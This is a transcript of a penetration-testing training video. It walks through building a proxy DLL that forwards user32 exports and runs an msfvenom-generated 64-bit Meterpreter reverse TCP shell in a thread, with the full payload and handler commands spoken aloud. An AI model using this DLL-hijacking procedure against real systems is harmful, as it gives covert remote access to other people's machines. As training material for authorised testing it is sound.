Hello all, welcome to the network pentesting series at Pentester Academy. Now in this video, we will look at how we can get a 64-bit Meterpreter running inside of the thread when we do function forwarding with our DLL. So the process is exactly the same, it isn't much different. So let's quickly go through it. So here is my thread template, which is pretty much exactly the same as in the last video, right? We create a thread, we copy the shellcode to memory into a new memory region, which is read, write, execute, and then we run it, right? The first step, of course, is to create our shellcode. So we can do an msf venom -p Windows x64 Meterpreter reverse TCP lhost equals 192.168.10.10 lport equals 9000 and the output format is C. And while we get this, we can set the exploit handler, use exploit multi-handler, set payload to Windows x64 Meterpreter reverse TCP, set lhost to 192.168.10.10, set lport to 9000, and as in the last function, last example, set exit function to thread, exit on session to false, exploit -j. There you go. Right, so we have our handler up and running. We also have our shellcode delivered to us. Because it's part of the DLL, we really aren't bothered about nulls and all of that stuff, right? Doesn't matter. This isn't part of an exploit. I always have a painfully tough time copying the shellcode. This is something wrong with my mouse. Okay, so I'm going to go back in here, paste this shellcode. Let's actually start pasting on a new line. It's much better formatted. And I'm also going to add my little metasploit command used to generate the shellcode. This is so that later on, if any of you guys forget these options, you could just quickly look at it and figure it out. There we go. Right, looks okay. Now I've already copied my 64-bit user 32 from the Windows machine over here. This is the real user 32, and I can use DLL export.py, give it user 32, user 32 underscore real.dll. All of this should be very familiar at this point. If not, you should probably go ahead and look at some of the previous videos. Now let me drop this inside a def file. Let's call it template.def. You pretty much call it anything you like. And now let's compile this into a 64-bit DLL. Thread template -o. Let's call this thread.dll. It's a static library. Oh my sorry. It's a shared. And then let's also mention the definition file. There we go. Now we should have thread.dll in the current directory. Let's go to Windows me refresh this view. Let's look at this inside CFF Explorer. I can go to the export directory, right, and we can find all of these exports in here. So everything looks perfect, just the way we want it. And I can now copy this thread.dll and go to my application directory. Now this is the same application directory which we used in previous videos, the x64 one, right? And let me paste this in here and rename this to user32. Let's go back in here. Let's run the application. Right, the application is up and running. Let's go to Metasploit, and here you go. You have a session waiting for you. And you can clearly see this is a 64-bit Meterpreter, right? What you could also do is go ahead and verify your PID and UID. So 1796, and if you look at this, you clearly see that 1796 is your 64-bit console application 2.exe, which is pretty much still happily running. And you could hit an exit in here, and your application would continue to run without any problems, right? Awesome. So hopefully you guys enjoyed this video, and if you're having fun at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you and have a great day ahead.